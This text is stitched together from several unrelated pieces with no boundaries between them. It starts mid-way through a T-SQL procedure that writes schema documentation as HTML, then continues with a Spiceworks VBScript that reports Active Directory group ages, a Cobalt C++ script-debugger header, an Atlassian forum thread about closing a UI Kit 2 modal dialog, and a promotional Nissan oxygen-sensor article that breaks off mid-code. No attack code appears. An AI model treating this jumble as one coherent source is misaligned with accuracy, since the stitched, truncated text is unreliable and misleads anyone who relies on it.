c2 ON c2.id = fk.rkeyid AND c2.colid = fk.rkey WHERE o1.xtype = 'F' AND o.id = @table_id UNION SELECT CASE o1.xtype WHEN 'C' THEN 'Check' WHEN 'D' THEN 'Default' WHEN 'F' THEN 'Foreign Key' WHEN 'PK' THEN 'Primary Key' WHEN 'UQ' THEN 'Unique' ELSE 'Other' END AS 'Constraint Type', o1.name AS 'Constraint name', o.name AS 'Table name', c1.name AS 'Column name', o2.name AS 'FK Table', c2.name AS 'FK Column name', fk.keyno AS 'KeyNo', NULL AS 'Default/Check Value' FROM sysobjects o JOIN sysobjects o1 ON o1.Parent_obj = o.id JOIN sysforeignkeys fk ON fk.rkeyid = o.id JOIN sysobjects o2 ON o2.id = fk.fkeyid LEFT JOIN syscolumns c1 ON c1.id = fk.rkeyid AND c1.colid = fk.rkey LEFT JOIN syscolumns c2 ON c2.id = fk.rkeyid AND c2.colid = fk.rkey where o1.xtype = 'PK' AND o.id = @table_id ) ORDER BY [Constraint Type] OPEN cursor_Constraint FETCH NEXT FROM cursor_Constraint INTO @CType,@CName,@CPKTable,@CPKColumn,@CFKTable,@CFKColumn,@CKey,@CDefault WHILE (@@FETCH_STATUS = 0) BEGIN IF @Populated = 0 BEGIN insert into #Results (ResultsText) SELECT @strHTML1 END SET @Populated = 1 SET @strHTML = '' insert into #Results (ResultsText) SELECT @strHTML FETCH NEXT FROM cursor_Constraint INTO @CType,@CName,@CPKTable,@CPKColumn,@CFKTable,@CFKColumn,@CKey,@CDefault END CLOSE cursor_Constraint DEALLOCATE cursor_Constraint SELECT @strHTML = ' Constraints   Constraint Type   Contraint name   Table   Column   FK Table   FK Column   Key No.   Default   ' + ISNULL(@CType, ' ') + '  ' + ISNULL(@CName, ' ') + '  ' + ISNULL(convert(varchar(120), @CPKTable), ' ') + '  ' + ISNULL(convert(varchar(120), @CPKColumn), ' ') + '  ' + ISNULL(convert(varchar(120), @CFKTable), ' ') + '  ' + ISNULL(convert(varchar(120), @CFKColumn), ' ') + '  ' + ISNULL(convert(varchar(5), @CKey), ' ') + '  ' + ISNULL(convert(varchar(255), @CDefault), ' ') + '   ' insert into #Results (ResultsText) SELECT @strHTML --############################################################################# --triggers --############################################################################# SET @strHTML1 = '' insert into #Results (ResultsText) SELECT @strHTML1 SET @strHTML1='' --optional if you explicitly want to see "no triggers exist" if not exists(SELECT [name] FROM sysobjects WHERE [xtype] = 'TR' AND parent_obj = @table_id) insert into #Results (ResultsText) SELECT '' SET @Populated = 0 SET @strHTML = '' DECLARE cursor_Triggers CURSOR FOR SELECT [name] AS TriggerName FROM sysobjects WHERE xtype = 'TR' AND parent_obj = @table_id OPEN cursor_Triggers FETCH NEXT FROM cursor_Triggers INTO @Trigger WHILE (@@FETCH_STATUS = 0) BEGIN IF @Populated = 0 BEGIN insert into #Results (ResultsText) SELECT @strHTML1 END SET @Populated = 1 SET @strHTML = '' insert into #Results (ResultsText) SELECT @strHTML FETCH NEXT FROM cursor_Triggers INTO @Trigger END CLOSE cursor_Triggers DEALLOCATE cursor_Triggers SELECT @strHTML = ' Triggers   No Triggers Exist for ' + @TableName + ' ' + ISNULL(@Trigger, ' ') + '   Back To Top ^ ' insert into #Results (ResultsText) SELECT @strHTML FETCH NEXT FROM cursor_documentation INTO @table_id, @TableName END CLOSE cursor_documentation DEALLOCATE cursor_documentation --############################################################################# --views --############################################################################# SELECT @strHTML = ' Views ' insert into #Results (ResultsText) SELECT @strHTML if not exists(SELECT [name] FROM sysobjects WHERE [xtype] = 'V' AND [category] <> 2) insert into #Results (ResultsText) SELECT ' No 
Views exist in ' + db_name() + ' ' DECLARE cursor_views CURSOR FOR SELECT [name] FROM sysobjects WHERE [xtype] = 'V' AND [category] <> 2 ORDER BY [name] OPEN cursor_views FETCH NEXT FROM cursor_views INTO @ViewName if @@FETCH_STATUS <> 0 begin SET @strHTML=' ' insert into #Results (ResultsText) SELECT @strHTML end WHILE (@@FETCH_STATUS = 0) BEGIN --Begin Table with view name as title SET @strHTML = ' ' + @ViewName + '   No Views Exist in ' + db_name() + '   ' insert into #Results (ResultsText) SELECT @strHTML SET @strHTML = '' DECLARE cursor_viewdeps CURSOR FOR SELECT TableSysObjects.name AS [Table],col.name AS [Column],(SELECT TOP 1 systypes.[name] FROM systypes WHERE xtype = col.xtype),col.length,col.prec, col.scale, col.[collation] FROM sysobjects ViewSysObjects LEFT OUTER JOIN sysdepends dep ON ViewSysObjects.id = dep.id LEFT OUTER JOIN sysobjects TableSysObjects ON dep.depid = TableSysObjects.id LEFT OUTER JOIN syscolumns col ON dep.depnumber = col.colid AND TableSysObjects.id = col.id WHERE ViewSysObjects.xtype = 'V' And ViewSysObjects.category = 0 AND ViewSysObjects.name = @ViewName ORDER BY ViewSysObjects.name,TableSysObjects.name,col.name OPEN cursor_viewdeps FETCH NEXT FROM cursor_viewdeps INTO @ViewTableDep,@ViewColDep,@ViewColDepType,@ViewColDepLength,@ViewColDepPrec,@ViewColDepScale,@ViewColDepCollation WHILE (@@FETCH_STATUS = 0) BEGIN -- Write the view dependencies SET @strHTML = '' insert into #Results (ResultsText) SELECT @strHTML FETCH NEXT FROM cursor_viewdeps INTO @ViewTableDep,@ViewColDep,@ViewColDepType,@ViewColDepLength,@ViewColDepPrec,@ViewColDepScale,@ViewColDepCollation END CLOSE cursor_viewdeps DEALLOCATE cursor_viewdeps --newly added proc DDL definition DELETE FROM @results insert into @results exec sp_GetDDL @ViewName SET @strHTML='' SELECT @strHTML =@strHTML + + REPLACE(REPLACE(results,CHAR(32),CHAR(160) ),CHAR(13) , ' ' + CHAR(13)) FROM @results SELECT @strHTML = '' insert into #Results (ResultsText) SELECT @strHTML --end newly added proc DDL definition SELECT @strHTML = ' ' + @ViewName + '   Table Dependencies   Column Dependencies   Column Type   Size   Precision   Scale   Collation   ' + ISNULL(convert(varchar(200), @ViewTableDep), ' ') + '  ' + ISNULL(convert(varchar(200), @ViewColDep), ' ') + '  ' + ISNULL(@ViewColDepType, ' ') + '  ' + ISNULL(convert(varchar(5), @ViewColDepLength), ' ') + '  ' + ISNULL(convert(varchar(5), @ViewColDepPrec), ' ') + '  ' + ISNULL(convert(varchar(5), @ViewColDepScale), ' ') + '  ' + ISNULL(@ViewColDepCollation, ' ') + '   ' + @strHTML + '   Back To Top ^ ' insert into #Results (ResultsText) SELECT @strHTML FETCH NEXT FROM cursor_views INTO @ViewName END CLOSE cursor_views DEALLOCATE cursor_views --############################################################################# --stored procs --############################################################################# SELECT @strHTML = ' Stored Procedures ' insert into #Results (ResultsText) SELECT @strHTML if not exists(SELECT [name] FROM sysobjects WHERE [xtype] = 'P' AND [category] <> 2) insert into #Results (ResultsText) SELECT ' No Procedures Exist in ' + db_name() + ' ' DECLARE cursor_sp CURSOR FOR SELECT [name] FROM sysobjects WHERE [xtype] = 'P' AND [category] <> 2 ORDER BY [name] OPEN cursor_sp FETCH NEXT FROM cursor_sp INTO @SPName WHILE (@@FETCH_STATUS = 0) BEGIN --Begin Table with view name as title SET @strHTML = ' ' insert into #Results (ResultsText) SELECT @strHTML SET @strHTML = '' DECLARE cursor_spdeps CURSOR FOR SELECT TableSysObjects.name AS 
[Table],col.name AS [Column],(SELECT top 1 systypes.[name] FROM systypes WHERE xtype = col.xtype),col.length,col.prec, col.scale, col.[collation] FROM sysobjects ViewSysObjects LEFT OUTER JOIN sysdepends dep ON ViewSysObjects.id = dep.id LEFT OUTER JOIN sysobjects TableSysObjects ON dep.depid = TableSysObjects.id LEFT OUTER JOIN syscolumns col ON dep.depnumber = col.colid AND TableSysObjects.id = col.id WHERE ViewSysObjects.xtype = 'P' And ViewSysObjects.category = 0 AND ViewSysObjects.name = @SPName ORDER BY ViewSysObjects.name,TableSysObjects.name,col.name OPEN cursor_spdeps FETCH NEXT FROM cursor_spdeps INTO @SPTableDep,@SPColDep,@SPColDepType,@SPColDepLength,@SPColDepPrec,@SPColDepScale,@SPColDepCollation WHILE (@@FETCH_STATUS = 0) BEGIN -- Write the view dependencies IF @SPColDep = '' BEGIN SET @SPColDep = ' ' END SET @strHTML = '' insert into #Results (ResultsText) SELECT @strHTML FETCH NEXT FROM cursor_spdeps INTO @SPTableDep,@SPColDep,@SPColDepType,@SPColDepLength,@SPColDepPrec,@SPColDepScale,@SPColDepCollation END CLOSE cursor_spdeps DEALLOCATE cursor_spdeps --newly added proc DDL definition DELETE FROM @results insert into @results exec sp_GetDDL @SPName SET @strHTML='' SELECT @strHTML =@strHTML + + REPLACE(REPLACE(results,CHAR(32),CHAR(160) ),CHAR(13) , ' ' + CHAR(13)) FROM @results SELECT @strHTML = '' insert into #Results (ResultsText) SELECT @strHTML --end newly added proc DDL definition SELECT @strHTML = ' ' + @SPName + ' ' insert into #Results (ResultsText) SELECT @strHTML SET @Populated = 0 SET @strHTML1 = ' ' DECLARE cursor_Params CURSOR FOR SELECT rtrim(c.name) PARAMETER , CASE WHEN TYPE_NAME(c.xusertype) IN ('decimal','numeric','float','real') THEN TYPE_NAME(c.xusertype) + ' (' + CONVERT(VARCHAR,c.prec) + ',' + CONVERT(VARCHAR,c.xscale) + ')' WHEN TYPE_NAME(c.xusertype) IN ('char','varchar') THEN TYPE_NAME(c.xusertype) + CASE WHEN length = -1 THEN ' (max)' ELSE ' ('+ CONVERT(VARCHAR,length) + ')' END WHEN TYPE_NAME(c.xusertype) IN ('nchar','nvarchar') THEN TYPE_NAME(c.xusertype) + CASE WHEN c.prec = -1 THEN ' (max)' ELSE ' ('+ CONVERT(VARCHAR,c.prec) + ')' END WHEN TYPE_NAME(c.xusertype) IN ('datetime','money','text','image') THEN TYPE_NAME(c.xusertype) + '' ELSE TYPE_NAME(c.xusertype) + '' END AS DATA_TYPE, case when c.isoutparam =1 then 'Output' else 'Input ' end as "Type" FROM sysobjects o INNER JOIN sysobjects od ON od.id = o.id LEFT OUTER JOIN syscolumns c ON o.id = c.id AND o.type = 'P' WHERE o.name = @SPName OPEN cursor_Params FETCH NEXT FROM cursor_Params INTO @ParamName,@ParamDataType,@ParamType WHILE (@@FETCH_STATUS = 0) BEGIN IF @Populated = 0 BEGIN insert into #Results (ResultsText) SELECT @strHTML1 END SET @Populated = 1 SET @strHTML = '' --SET @strHTML = ' ' + @ParamType + ' - ' + @ParamName + ' ' + @ParamDataType + '' insert into #Results (ResultsText) SELECT @strHTML FETCH NEXT FROM cursor_Params INTO @ParamName,@ParamDataType,@ParamType END CLOSE cursor_Params DEALLOCATE cursor_Params IF @Populated = 1 BEGIN insert into #Results (ResultsText) SELECT ' Parameters   ' + ISNULL(convert(varchar(200), @ParamType), ' ') + '  ' + ISNULL(convert(varchar(200), @ParamName), ' ') + '  ' + ISNULL(convert(varchar(200), @ParamDataType), ' ') + '   ' END SET @strHTML = '   Table Dependencies   Column Dependencies   Column Type   Size   Precision   Scale   Collation   ' + ISNULL(convert(varchar(200), @SPTableDep), ' ') + '  ' + ISNULL(convert(varchar(200), @SPColDep), ' ') + '  ' + ISNULL(@SPColDepType, ' ') + '  ' + ISNULL(convert(varchar(5), @SPColDepLength), ' ') + 
'  ' + ISNULL(convert(varchar(5), @SPColDepPrec), ' ') + '  ' + ISNULL(convert(varchar(5), @SPColDepScale), ' ') + '  ' + ISNULL(@SPColDepCollation, ' ') + '   ' + @strHTML + '   Back To Top ^ ' insert into #Results (ResultsText) SELECT @strHTML FETCH NEXT FROM cursor_sp INTO @SPName END CLOSE cursor_sp DEALLOCATE cursor_sp --############################################################################# --functions --############################################################################# SELECT @strHTML = ' Functions ' insert into #Results (ResultsText) SELECT @strHTML if not exists(SELECT [name] FROM sysobjects WHERE [xtype] IN('FN','TF','IF') AND [category] <> 2) insert into #Results (ResultsText) SELECT ' No Functions Exist in ' + db_name() + ' ' DECLARE cursor_sp CURSOR FOR SELECT [name] FROM sysobjects WHERE [xtype] IN('FN','TF','IF') AND [category] <> 2 ORDER BY [name] OPEN cursor_sp FETCH NEXT FROM cursor_sp INTO @SPName WHILE (@@FETCH_STATUS = 0) BEGIN --Begin Table with view name as title SET @strHTML = ' ' insert into #Results (ResultsText) SELECT @strHTML SET @strHTML = '' DECLARE cursor_spdeps CURSOR FOR SELECT TableSysObjects.name AS [Table],col.name AS [Column],(SELECT top 1 systypes.[name] FROM systypes WHERE xtype = col.xtype),col.length,col.prec, col.scale, col.[collation] FROM sysobjects ViewSysObjects LEFT OUTER JOIN sysdepends dep ON ViewSysObjects.id = dep.id LEFT OUTER JOIN sysobjects TableSysObjects ON dep.depid = TableSysObjects.id LEFT OUTER JOIN syscolumns col ON dep.depnumber = col.colid AND TableSysObjects.id = col.id WHERE ViewSysObjects.xtype IN('FN','TF','IF') And ViewSysObjects.category = 0 AND ViewSysObjects.name = @SPName ORDER BY ViewSysObjects.name,TableSysObjects.name,col.name OPEN cursor_spdeps FETCH NEXT FROM cursor_spdeps INTO @SPTableDep,@SPColDep,@SPColDepType,@SPColDepLength,@SPColDepPrec,@SPColDepScale,@SPColDepCollation WHILE (@@FETCH_STATUS = 0) BEGIN -- Write the view dependencies IF @SPColDep = '' BEGIN SET @SPColDep = ' ' END SET @strHTML = '' insert into #Results (ResultsText) SELECT @strHTML FETCH NEXT FROM cursor_spdeps INTO @SPTableDep,@SPColDep,@SPColDepType,@SPColDepLength,@SPColDepPrec,@SPColDepScale,@SPColDepCollation END CLOSE cursor_spdeps DEALLOCATE cursor_spdeps --newly added function DDL definition DELETE FROM @results insert into @results exec sp_GetDDL @SPName SET @strHTML='' SELECT @strHTML =@strHTML + + REPLACE(REPLACE(results,CHAR(32),CHAR(160) ),CHAR(13) , ' ' + CHAR(13)) FROM @results SELECT @strHTML = '' insert into #Results (ResultsText) SELECT @strHTML --end newly added proc DDL definition SELECT @strHTML = ' ' + @SPName + ' ' insert into #Results (ResultsText) SELECT @strHTML SET @Populated = 0 SET @strHTML1 = ' ' DECLARE cursor_Params CURSOR FOR SELECT rtrim(c.name) PARAMETER , CASE WHEN TYPE_NAME(c.xusertype) IN ('decimal','numeric','float','real') THEN TYPE_NAME(c.xusertype) + ' (' + CONVERT(VARCHAR,c.prec) + ',' + CONVERT(VARCHAR,c.xscale) + ')' WHEN TYPE_NAME(c.xusertype) IN ('char','varchar') THEN TYPE_NAME(c.xusertype) + CASE WHEN length = -1 THEN ' (max)' ELSE ' ('+ CONVERT(VARCHAR,length) + ')' END WHEN TYPE_NAME(c.xusertype) IN ('nchar','nvarchar') THEN TYPE_NAME(c.xusertype) + CASE WHEN c.prec = -1 THEN ' (max)' ELSE ' ('+ CONVERT(VARCHAR,c.prec) + ')' END WHEN TYPE_NAME(c.xusertype) IN ('datetime','money','text','image') THEN TYPE_NAME(c.xusertype) + '' ELSE TYPE_NAME(c.xusertype) + '' END AS DATA_TYPE, case when c.isoutparam =1 then 'Output' else 'Input ' end as "Type" FROM sysobjects o INNER JOIN 
sysobjects od ON od.id = o.id LEFT OUTER JOIN syscolumns c ON o.id = c.id AND o.type IN('FN','TF','IF') WHERE o.name = @SPName OPEN cursor_Params FETCH NEXT FROM cursor_Params INTO @ParamName,@ParamDataType,@ParamType WHILE (@@FETCH_STATUS = 0) BEGIN IF @Populated = 0 BEGIN insert into #Results (ResultsText) SELECT @strHTML1 END SET @Populated = 1 SET @strHTML = '' --SET @strHTML = ' ' + @ParamType + ' - ' + @ParamName + ' ' + @ParamDataType + '' insert into #Results (ResultsText) SELECT @strHTML FETCH NEXT FROM cursor_Params INTO @ParamName,@ParamDataType,@ParamType END CLOSE cursor_Params DEALLOCATE cursor_Params IF @Populated = 1 BEGIN insert into #Results (ResultsText) SELECT ' Parameters   ' + ISNULL(convert(varchar(200), @ParamType), ' ') + '  ' + ISNULL(convert(varchar(200), @ParamName), ' ') + '  ' + ISNULL(convert(varchar(200), @ParamDataType), ' ') + '   ' END SET @strHTML = '   Table Dependencies   Column Dependencies   Column Type   Size   Precision   Scale   Collation   ' + ISNULL(convert(varchar(200), @SPTableDep), ' ') + '  ' + ISNULL(convert(varchar(200), @SPColDep), ' ') + '  ' + ISNULL(@SPColDepType, ' ') + '  ' + ISNULL(convert(varchar(5), @SPColDepLength), ' ') + '  ' + ISNULL(convert(varchar(5), @SPColDepPrec), ' ') + '  ' + ISNULL(convert(varchar(5), @SPColDepScale), ' ') + '  ' + ISNULL(@SPColDepCollation, ' ') + '   ' + @strHTML + '   Back To Top ^ ' insert into #Results (ResultsText) SELECT @strHTML FETCH NEXT FROM cursor_sp INTO @SPName END CLOSE cursor_sp DEALLOCATE cursor_sp SELECT @strHTML = '' insert into #Results (ResultsText) SELECT @strHTML SELECT ResultsText FROM #Results ORDER BY ResultsID END --PROC
Active Directory Group age

Description

Queries Active Directory to get a list of all user groups, the date each was created and last modified, and writes the output to a CSV file. Useful when cleaning up Active Directory.

Note: The script uses rootDSE to bind to the domain in which you are logged on. If you are in a forest scenario and want to bind to the root, you can replace ("defaultNamingContext") with ("rootDomainNamingContext").

Source Code

This script has not been checked by Spiceworks. Please understand the risks before using it.

'==========================================================================
' Name:   GroupAge_AD.vbs
' Author: Jose Cruz (merlinpr)
' Date:   11/04/2009
' Desc:   Queries Active Directory for all group objects and writes the date
'         when it was created and last modified to a CSV file.
'==========================================================================
On Error Resume Next

Const ADS_SCOPE_SUBTREE = 2

Set RootDSE = GetObject("LDAP://RootDSE")
domainContainer = rootDSE.Get("defaultNamingContext")

Set objConnection = CreateObject("ADODB.Connection")
Set objCommand = CreateObject("ADODB.Command")
objConnection.Provider = "ADsDSOObject"
objConnection.Open "Active Directory Provider"
Set objCommand.ActiveConnection = objConnection

objCommand.Properties("Page Size") = 1000
objCommand.Properties("Searchscope") = ADS_SCOPE_SUBTREE

objCommand.CommandText = _
    "SELECT Name, whenChanged, whenCreated FROM 'LDAP://" & domainContainer & "' WHERE objectCategory='group'"

Set objRecordSet = objCommand.Execute
objRecordSet.MoveFirst

Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objLogFile = objFSO.CreateTextFile("ADGroups_Age.csv", _
    ForWriting, True)

Do Until objRecordSet.EOF
    objLogFile.Write objRecordSet.Fields("Name").Value & ","
    objLogFile.Write objRecordSet.Fields("whenCreated").Value & ","
    objLogFile.Write objRecordSet.Fields("whenChanged").Value
    objLogFile.Writeline
    objRecordSet.MoveNext
Loop

objLogFile.Close
objRecordset.Close
objConnection.Close

6 Comments

• merlinpr (Thai Pepper): Changed the script to bind to rootDSE instead of having people type the domain name in the LDAP query manually. Thanks to Martin9700 for the suggestion. I wrote the script very quickly to try to answer a question on a post and got lazy... lol

• Shane Fontenot (Thai Pepper): Could you tweak this to show the age of computer accounts? Nice script for getting the age of groups, but it would be more helpful if it listed computer account age for AD cleanup. Thanks.

• merlinpr (Thai Pepper): shanfont, to check the age of computer accounts you might want to look into OldCmp from Joeware: http://www.joeware.net/freetools/tools/oldcmp/index.htm I could modify the script to do what you asked very easily, but OldCmp can do so much more. I recommend you download it and just run (from the command line) oldcmp /? so you can see all the options. I use it to check the age of computer accounts and have it save the output to HTML. I must warn you that it is a very powerful tool, so be careful if you use it for anything other than reporting.

• Castle6342 (Pimiento): Hi, this is a great script and thanks for posting. I'm wondering what I would have to do to add the description of the group to the output sheet. I have tried adding the "description" attribute to the script but it just doesn't work.

• Ben6294 (Pimiento): Massively awesome. You just saved me a lot of time. I would imagine that I can just modify the WHERE objectCategory='group' to WHERE objectCategory='Computer' to get the same info, right?

• collinmarsden1 (Pimiento): Is there a way to have a "last used" column?
// Copyright 2016 The Cobalt Authors. All Rights Reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
//     http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.

#ifndef COBALT_SCRIPT_SCRIPT_DEBUGGER_H_
#define COBALT_SCRIPT_SCRIPT_DEBUGGER_H_

#include <memory>
#include <set>
#include <string>
#include <vector>

#include "base/values.h"
#include "cobalt/script/call_frame.h"
#include "cobalt/script/source_provider.h"

namespace cobalt {
namespace script {

class GlobalEnvironment;

// Engine-independent pure virtual interface to a JavaScript debugger.
// Used as an opaque interface to the specific debugger implementation,
// e.g. JSCDebugger.
// Only pure virtual or static methods should be added to this class.
// No data members should be added to this class.
class ScriptDebugger {
 public:
  // Ideally, we want the delegate to do as much as possible, as its
  // implementation can be independent of the specific JS engine.
  class Delegate {
   public:
    // Called when the script debugger wants to pause script execution.
    virtual void OnScriptDebuggerPause() = 0;

    // Called when the script debugger wants to resume script execution, both
    // after a pause and to start running after the devtools frontend connects.
    virtual void OnScriptDebuggerResume() = 0;

    // Called with the response to a previously dispatched protocol message.
    virtual void OnScriptDebuggerResponse(const std::string& response) = 0;

    // Called when a debugging protocol event occurs.
    virtual void OnScriptDebuggerEvent(const std::string& event) = 0;
  };

  // Receives trace events from the JS engine in the JSON Trace Event Format.
  // https://docs.google.com/document/d/1CvAClvFfyA5R-PhYUmn5OOQtYMH4h6I0nSsKchNAySU
  class TraceDelegate {
   public:
    virtual ~TraceDelegate() {}

    virtual void AppendTraceEvent(const std::string& trace_event_json) = 0;
    virtual void FlushTraceEvents() = 0;
  };

  // Possible pause on exceptions states.
  enum PauseOnExceptionsState { kAll, kNone, kUncaught };

  // Used to temporarily override the pause on exceptions state, e.g. to
  // disable it when executing devtools backend scripts.
  class ScopedPauseOnExceptionsState {
   public:
    ScopedPauseOnExceptionsState(ScriptDebugger* script_debugger,
                                 PauseOnExceptionsState state)
        : script_debugger_(script_debugger) {
      DCHECK(script_debugger_);
      stored_state_ = script_debugger_->SetPauseOnExceptions(state);
    }

    ~ScopedPauseOnExceptionsState() {
      script_debugger_->SetPauseOnExceptions(stored_state_);
    }

   private:
    ScriptDebugger* script_debugger_;
    PauseOnExceptionsState stored_state_;
  };

  // Factory method to create an engine-specific instance. Implementation to be
  // provided by derived class.
  static std::unique_ptr<ScriptDebugger> CreateDebugger(
      GlobalEnvironment* global_environment, Delegate* delegate);

  // Attach/detach the script debugger. Saved state can be passed between
  // instances as an opaque string.
  virtual void Attach(const std::string& state) = 0;
  virtual std::string Detach() = 0;

  // Evaluate JavaScript code that is part of the debugger implementation, such
  // that it does not get reported as debuggable source. Returns true on
  // success, false if there is an exception. If out_result_utf8 is non-NULL, it
  // will be set to hold the result of the script evaluation if the script
  // succeeds, or an exception message if it fails.
  virtual bool EvaluateDebuggerScript(const std::string& js_code,
                                      std::string* out_result_utf8) = 0;

  // For engines like V8 that directly handle protocol commands.
  virtual std::set<std::string> SupportedProtocolDomains() = 0;
  virtual bool DispatchProtocolMessage(const std::string& method,
                                       const std::string& message) = 0;

  // Creates a JSON representation of an object.
  // https://chromedevtools.github.io/devtools-protocol/1-3/Runtime#type-RemoteObject
  virtual std::string CreateRemoteObject(const ValueHandleHolder& object,
                                         const std::string& group) = 0;

  // Lookup the object ID that was in the JSON from |CreateRemoteObject| and
  // return the JavaScript object that it refers to.
  // https://chromedevtools.github.io/devtools-protocol/1-3/Runtime#type-RemoteObject
  virtual const script::ValueHandleHolder* LookupRemoteObjectId(
      const std::string& object_id) = 0;

  // For performance tracing of JavaScript methods.
  virtual void StartTracing(const std::vector<std::string>& categories,
                            TraceDelegate* trace_delegate) = 0;
  virtual void StopTracing() = 0;

  virtual PauseOnExceptionsState SetPauseOnExceptions(
      PauseOnExceptionsState state) = 0;  // Returns the previous state.

 protected:
  virtual ~ScriptDebugger() {}
  friend std::unique_ptr<ScriptDebugger>::deleter_type;
};

}  // namespace script
}  // namespace cobalt

#endif  // COBALT_SCRIPT_SCRIPT_DEBUGGER_H_
How to close the modal dialog of a UI Kit 2 Confluence ContentAction?

Dear Community,

I would like to create a Confluence ContentAction with UI Kit 2. The following skeleton gets rendered correctly as a Content Action inside a ModalDialog, and because of the presence of a Form, we already get a Submit button rendered normally, right aligned, next to the default Cancel button. However, clicking the Submit button (thereby setting isOpen to false) results in only the form (including the Submit button) disappearing; the ModalDialog itself stays open.

1. How is it possible to close it with the Submit button, or for that matter, any custom button or action other than the automatically added Cancel button? (The default Cancel button closes the ModalDialog correctly.)
2. Is it possible to rename the default Cancel button to anything else (like No, Abort, Exit, Close, etc.)?

const ContentActionDialog = () => {
  const [isOpen, setOpen] = useState(true);
  if (!isOpen) {
    return null;
  } else {
    return (
      <>
        <Form onSubmit={data => {
          console.log("Submit clicked");
          setOpen(false);
        }}>
          <Text>Some text</Text>
        </Form>
      </>
    );
  }
}

ForgeReconciler.render(
  <React.StrictMode>
    <ContentActionDialog/>
  </React.StrictMode>
);

By the way, returning a ModalDialog from the ContentActionDialog function above results in two modal dialogs opening on top of each other, so I suppose it is correct that I am only returning the contents of the ModalDialog here. I have also tried view.close() (as the view object from @forge/bridge is available in UI Kit 2), but to no avail.

The reason that the form disappears is that you are returning null when isOpen is false, which renders nothing. I'm also interested in whether it's possible to close a UI Kit 2 view programmatically. As mentioned above, calling view.close doesn't work.

For example, I created this confluence:contentAction using UI Kit 2:

import React from "react";
import ForgeReconciler, { Form, TextField } from "@forge/react";
import { view } from "@forge/bridge";

const App = () => {
  return (
    <Form
      onSubmit={() => {
        view.close().catch((e) => {
          console.log("error closing", e);
        });
      }}
    >
      <TextField name="username" label="Username" />
    </Form>
  );
};

ForgeReconciler.render(
  <React.StrictMode>
    <App />
  </React.StrictMode>
);

When submitting the form, the following is logged:

[Log] error closing – Error: this resource's view is not closable. (main.js, line 2)

I've also tested a bitbucket:repoCodeOverviewAction, which rejects the close promise with the same error.

cc @ddraper @QuocLieu, I can see that you've worked on UI Kit 2, so wondering whether you may know?

Hi @joshp, the view.close call is primarily used for Custom UI modals. Unfortunately, at this point in time the cancel button is the only way to close the modal. A feature request for this can be logged here.

Thanks very much for the response @QuocLieu - have opened FRGE-1333.
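Until programmatic closing is supported (see the feature request above), one way to avoid the "empty but still open" dialog described in the first reply is to keep rendering something after submission instead of returning null. The sketch below is only an illustration of that idea, built from the components already shown in this thread; the confirmation text and state handling are assumptions, not an official Forge pattern:

import React, { useState } from "react";
import ForgeReconciler, { Form, Text } from "@forge/react";

const ContentActionDialog = () => {
  // Track whether the form has been submitted instead of unmounting everything.
  const [submitted, setSubmitted] = useState(false);

  if (submitted) {
    // The modal cannot be closed from code, so show a confirmation and let the
    // user dismiss the dialog with the built-in Cancel button.
    return <Text>Done. You can close this dialog with the Cancel button.</Text>;
  }

  return (
    <Form onSubmit={() => setSubmitted(true)}>
      <Text>Some text</Text>
    </Form>
  );
};

ForgeReconciler.render(
  <React.StrictMode>
    <ContentActionDialog />
  </React.StrictMode>
);

This does not answer the original question (the Cancel button still cannot be renamed or replaced), but it keeps the dialog from looking broken after submit.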
__label__pos
0.992298
234-4313 Upstream Oxygen Sensor Why the 234-4313 Upstream Oxygen Sensor Is Crucial for Your 2005-2006 Nissan Frontier 4.0 V6 Greetings to all automobile enthusiasts and Nissan Frontier owners! In the realm of automotive engineering, precision is paramount. Among the array of components that contribute to your vehicle's performance, the 234-4313 upstream oxygen sensor holds a pivotal place. This article explains why the 234-4313 upstream oxygen sensor is crucial for the 2005-2006 Nissan Frontier 4.0 V6 model, and looks at the role this sensor plays in your driving experience and in the performance of your Nissan Frontier. Enhancing Combustion Efficiency The Heart of the Powerplant At the heart of every vehicle lies the engine, a symphony of components working in harmony to generate power. The 234-4313 upstream oxygen sensor—also referred to as an O2 sensor—plays a vital role in this symphony. Positioned in the exhaust manifold, this sensor monitors the oxygen content in the exhaust gases and relays this information to the engine control module (ECM). The ECM, in turn, adjusts the air-fuel mixture to achieve optimal combustion efficiency. Optimizing Fuel Economy Efficient combustion directly influences fuel economy. The precision provided by the 234-4313 upstream oxygen sensor ensures that the air-fuel mixture is accurately calibrated. This results in more complete combustion, delivering better power output and reducing fuel consumption. With this sensor in place, every journey in your Nissan Frontier becomes an exercise in maximizing fuel efficiency. Emission Control and Environmental Responsibility A Guardian of Emission Levels Environmental consciousness is a driving force in modern automotive engineering. The 234-4313 upstream oxygen sensor contributes significantly to this endeavor by aiding in emission control. Accurate combustion, facilitated by precise oxygen-level monitoring, minimizes the emission of harmful pollutants. This aligns with stringent emission standards and reflects a commitment to cleaner air and a healthier planet. Preserving Engine Longevity Detecting Potential Issues The 234-4313 upstream oxygen sensor is not only a guardian of combustion efficiency but also a diagnostic tool. Deviations from the optimal air-fuel mixture can indicate potential engine issues or malfunctioning components. Detecting these irregularities early can prevent potential damage, safeguarding the longevity of your 2005-2006 Nissan Frontier 4.0 V6. Conclusion In conclusion, the 234-4313 upstream oxygen sensor proves its worth as a cornerstone of automotive precision. From enhancing combustion efficiency to promoting emission control and detecting potential issues, this sensor is a testament to the synergy of technology and responsible engineering. As you navigate the roads in your 2005-2006 Nissan Frontier 4.0 V6, remember that the 234-4313 upstream oxygen sensor is working diligently to ensure a harmonious blend of performance, efficiency, and environmental consciousness. Embrace the excellence of automotive engineering and responsible driving, knowing that every mile is powered by the precision and functionality of the 234-4313 upstream oxygen sensor.
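To make the closed-loop idea described above (sensor reading in, air-fuel correction out) a little more concrete, here is a deliberately oversimplified toy sketch in Python. It is not how a real ECM is programmed; the target value, gain and sensor readings are invented purely for illustration.

# Toy proportional correction, for illustration only; a real ECM uses far more elaborate control logic.
TARGET_LAMBDA = 1.00  # normalized stoichiometric air-fuel ratio (assumed target)

def update_fuel_trim(measured_lambda, fuel_trim, gain=0.05):
    # A lean mixture (lambda above 1) produces a positive error, so the trim adds fuel.
    error = measured_lambda - TARGET_LAMBDA
    return fuel_trim + gain * error

fuel_trim = 0.0
for reading in [1.06, 1.04, 1.02, 1.01]:  # invented sensor readings drifting toward the target
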